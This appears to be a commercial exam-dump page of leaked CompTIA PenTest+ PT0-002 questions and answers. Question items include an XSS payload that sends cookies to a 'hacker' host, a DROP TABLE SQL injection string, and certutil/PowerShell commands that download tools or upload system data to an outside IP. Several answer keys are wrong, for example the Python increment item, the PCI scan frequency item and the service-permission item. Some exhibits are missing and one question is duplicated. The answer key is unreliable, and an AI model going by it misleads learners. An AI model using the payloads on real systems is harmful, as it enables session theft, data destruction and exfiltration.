[Jan-2023] Get 100% Real PT0-002 Exam Questions, Accurate & Verified Actual4Labs Dumps in the Real Exam! [Q15-Q35]

Share

[Jan-2023] Get 100% Real PT0-002 Exam Questions, Accurate & Verified Actual4Labs Dumps in the Real Exam!

Pass Your CompTIA PenTest+ Exams Fast. All Top PT0-002 Exam Questions Are Covered.

NEW QUESTION 15
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Web-application firewall
  • B. Base64 encoding
  • C. Session tokens
  • D. Output encoding
  • E. Parameterized queries
  • F. Input validation

Answer: D,F

Explanation:
Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the &lt; string when writing to an HTML page.

 

NEW QUESTION 16
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Race-condition attacks
  • B. Zero-day attacks
  • C. Buffer overflows
  • D. Injection flaws
  • E. Cross-site scripting
  • F. Ransomware attacks

Answer: D,E

Explanation:
Explanation
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring

 

NEW QUESTION 17
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

  • A. MITRE ATT&CK framework
  • B. PTES technical guidelines
  • C. NIST SP 800-53
  • D. OWASP Top 10

Answer: A

 

NEW QUESTION 18
A penetration tester conducted an assessment on a web server. The logs from this session show the following:
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Which of the following attacks is being attempted?

  • A. Cookie hijacking
  • B. Session hijacking
  • C. Cross-site scripting
  • D. Parameter pollution
  • E. Clickjacking

Answer: D

 

NEW QUESTION 19
A penetration tester obtained the following results after scanning a web server using the dirb utility:
...
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 - FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration tester?

  • A. home.html
  • B. about
  • C. info
  • D. index.html

Answer: B

 

NEW QUESTION 20
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  • A. Download the smb.conf file and look at configurations
  • B. Edit the discovered file with one line of code for remote callback
  • C. Edit the smb.conf file and upload it to the server
  • D. Download .pl files and look for usernames and passwords

Answer: C

 

NEW QUESTION 21
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

  • A. Ensure the client has signed the SOW.
  • B. Verify the client has granted network access to the hot site.
  • C. Determine if the failover environment relies on resources not owned by the client.
  • D. Establish communication and escalation procedures with the client.

Answer: C

 

NEW QUESTION 22
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

  • A. ssh 10.10.1.2
  • B. nc 127.0.0.1 5555
  • C. nc 10.10.1.2
  • D. ssh 127.0.0.1 5555

Answer: C

 

NEW QUESTION 23
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

  • A. Escalate the issue.
  • B. Check the scoping document to determine if exfiltration is within scope.
  • C. Include the discovery and interaction in the daily report.
  • D. Stop the penetration test.

Answer: C

 

NEW QUESTION 24
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

  • A. The executive summary and information regarding the testing company
  • B. A quick description of the vulnerability and a high-level control to fix it
  • C. The rules of engagement from the assessment
  • D. Information regarding the business impact if compromised

Answer: B

Explanation:
The systems administrator and the technical stuff would be more interested in the technical aspect of the findings

 

NEW QUESTION 25
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

  • A. Recommend using a password manage/vault instead of text files to store passwords securely.
  • B. Recommend configuring password complexity rules in all the systems and applications.
  • C. Document the unprotected file repository as a finding in the penetration-testing report.
  • D. Create a custom password dictionary as preparation for password spray testing.

Answer: C

 

NEW QUESTION 26
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Race-condition attacks
  • B. Zero-day attacks
  • C. Buffer overflows
  • D. Injection flaws
  • E. Cross-site scripting
  • F. Ransomware attacks

Answer: D,E

Explanation:
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring

 

NEW QUESTION 27
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Perform a brute-force attack over the server.
  • B. Wait for the next login and perform a downgrade attack on the server.
  • C. Capture traffic using Wireshark.
  • D. Use an FTP exploit against the server.

Answer: C

 

NEW QUESTION 28
Which of the following expressions in Python increase a variable val by one (Choose two.)

  • A. val=val++
  • B. ++val
  • C. val++
  • D. val+=1
  • E. val=(val+1)
  • F. +val

Answer: B,D

 

NEW QUESTION 29
A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

Which of the following would be a recommendation for remediation?

  • A. Deploy a user training program
  • B. Utilize the secure software development life cycle
  • C. Implement a patch management plan
  • D. Configure access controls on each of the servers

Answer: C

 

NEW QUESTION 30
A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement?

  • A. Obstructing the motion sensors in the hallway of the records room
  • B. Presenting a false employee ID to the night guard
  • C. Climbing in an open window of the adjoining building
  • D. Prying the lock open on the records room

Answer: B

Explanation:
"to be conducted after hours and should not include circumventing the alarm or performing destructive entry"

 

NEW QUESTION 31
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

  • A. Side channel
  • B. Cybersquatting
  • C. Data flooding
  • D. Session riding

Answer: A

Explanation:
https://www.techtarget.com/searchsecurity/definition/side-channel-attack#:~:text=Side%2Dchannel%20attacks%20can%20even,share%20the%20same%20physical%20hardware

 

NEW QUESTION 32
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

  • A. Annually
  • B. Quarterly
  • C. Monthly
  • D. Weekly

Answer: D

 

NEW QUESTION 33
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. wget
    http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
  • B. certutil
    -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • C. powershell
    (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
  • D. schtasks /query /fo LIST /v | find /I "Next Run Time:"

Answer: C

 

NEW QUESTION 34
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.
Which of the following would the tester MOST likely describe as a benefit of the framework?

  • A. The framework is static and ensures stability of a security program overtime.
  • B. Understanding the tactics of a security intrusion can help disrupt them.
  • C. The methodology can be used to estimate the cost of an incident better.
  • D. Scripts that are part of the framework can be imported directly into SIEM tools.

Answer: B

 

NEW QUESTION 35
......

Penetration testers simulate PT0-002 exam: https://www.actual4labs.com/CompTIA/PT0-002-actual-exam-dumps.html

Free Test Engine For CompTIA PenTest+ Certification Certification Exams: https://drive.google.com/open?id=1wpJM2u3QZjwfna2CnkQv9M6Q3j8Vcfw5

Contact Us

If you have any question please leave me your email address, we will reply and send email to you in 12 hours.

Our Working Time: ( GMT 0:00-15:00 )
From Monday to Saturday

Support: Contact now